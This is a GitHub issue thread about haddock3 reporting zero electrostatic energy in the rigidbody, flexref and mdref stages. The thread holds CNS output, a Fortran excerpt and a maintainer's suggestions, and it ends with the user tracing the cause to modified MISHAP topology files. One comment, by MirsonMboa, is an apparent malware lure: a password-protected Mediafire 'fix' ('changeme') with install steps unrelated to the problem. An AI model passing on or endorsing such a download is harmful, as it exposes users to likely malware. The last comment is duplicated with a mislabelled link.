### ISSUE TITLE
Electrostatic potential is alway zero without explanation why

### ISSUE THREAD

**Issue by Mishakolok** [haddocking/haddock3#979]
## **Question**
I am trying to perform calculations of the structure of protein dimer with docked ligands. The ligands were successfully parametrized using AcPype.
However, I have a problem with the calculation of electrostatic potential. During [topoaa] stage E(Elec) is calculated, while later in [rigidbody], [flexref] and [mdref] it is always zero.
` --------------- cycle=    30 --------------------------------------------------
 | Etotal =7073.005   grad(E)=15.943     E(VDW )=2506.030   E(ELEC)=0.000      |
 | E(NOE )=4566.975                                                            |
 -------------------------------------------------------------------------------`
During those stages in the .out files there is a segment that doesn't appear in [topoaa] output file.
```
 -----nonbonded-list-options-------------------------------
 | CUTNb=   9.500 TOLErance=   0.500 WMIN=   0.500 ATOM   |
 | INHIbit=   0.250                                       |
 -----no electrostatic-------------------------------------
 ------------- repulsive potential ------------------------
 | REPEl   1.000 RCONst=  16.000 REXPonent=   4           |
 | IREXponent=   1                                        |
 -----exclusion list options-------------------------------
 | NBXMOD=   5                                            |
 ----------------------------------------------------------
```
From what I can tell, that line appears from the source code of CNS in the file nbonds.f
```
      WRITE(6,'(2A)') ' -----nonbonded-list-options-----------',
     & '--------------------'
      WRITE(6,'(A,F8.3,A,F8.3,A,F8.3,3A)')
     & ' | CUTNb=',CUTNB,' TOLErance=',NBXTOL,' WMIN=',WMIN,' ',SGROUP,
     & '  |'
      WRITE(6,'(A,F8.3,A)')
     & ' | INHIbit=',INHIBT,
     & '                                       |'
      IF (FREPEL.GT.0.0D0) THEN
      WRITE(6,'(2A)') ' -----no electrostatic-----------------',
     & '--------------------'
      WRITE(6,'(2A)') ' ------------- repulsive potential ----',
     & '--------------------'
```
However, from the source code I have no idea what it actually means, and more importantly, how to fix it in my calculations. Is there any way to find this out?

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amjjbonvin** [comment]
Check: https://www.bonvinlab.org/software/haddock2.4/faq/#small-ligand-docking-with-haddock

Could be your AcPype generated param file contains a NBONDs statement that needs to be removed.

**Comment by Mishakolok** [comment]
> Check: https://www.bonvinlab.org/software/haddock2.4/faq/#small-ligand-docking-with-haddock Could be your AcPype generated param file contains a NBONDs statement that needs to be removed.

Thank you for the quick reply! None of the topology files have NBONDs statement (I have attached them).
[ce6_CNS.zip](https://github.com/user-attachments/files/16758975/ce6_CNS.zip)

**Comment by Mishakolok** [comment]
Also here are the input and output files from each module
[HADDOCK_ce6_outputs.zip](https://github.com/user-attachments/files/16759013/HADDOCK_ce6_outputs.zip)

**Comment by amjjbonvin** [comment]
What are you trying to do exactly? 
What are you docking? 
How does your workflow looks like...

The top/param files from AcPype look fine to me.  In the examples directory there is protein-ligand docking example. Have a look

**Comment by amjjbonvin** [comment]
Also remember haddock3 is still in beta release. Make sure to have a recent version installed.

**Comment by Mishakolok** [comment]
I apologize for any confusion earlier. I am working on using experimental restraints to model the structure of a dimer formed by two identical proteins (albumin), each with bound ligands. 
The binding configuration of the ligands is already known. My focus is on understanding how these two protein-ligand complexes interact with each other.
After running the calculations I get sensible complexes that fit my restraints, although with poor clustering, which (I think) might be due to the lack of electrostatic repulsion.

**Comment by amjjbonvin** [comment]
If the ligands are not at the interface, you could leave them out and see if this is the origin of the problem.

Are the examples provided working fine, i.e. giving proper electrostatic energies?

**Comment by Mishakolok** [comment]
Hello again, It appears that the issue was entirely on my end. I was using modified topology files from the MISHAP package [https://github.com/morganbye/MISHAP](), which included altered residues. These files were originally developed for older versions of Haddock. Once I reverted to the original topology files, everything was resolved. Interestingly, simply extracting the topology for the specific residue I needed and incorporating it into the original files also worked well. I apologize for any confusion caused!

**Comment by Mishakolok** [comment]
Hello again, It appears that the issue was entirely on my end. I was using modified topology files from the MISHAP package [https://github.com/morganbye/MISHAP](https://github.com/haddocking/haddock3/issues/979), which included altered residues. These files were originally developed for older versions of Haddock. Once I reverted to the original topology files, everything was resolved. Interestingly, simply extracting the topology for the specific residue I needed and incorporating it into the original files also worked well. I apologize for any confusion caused!
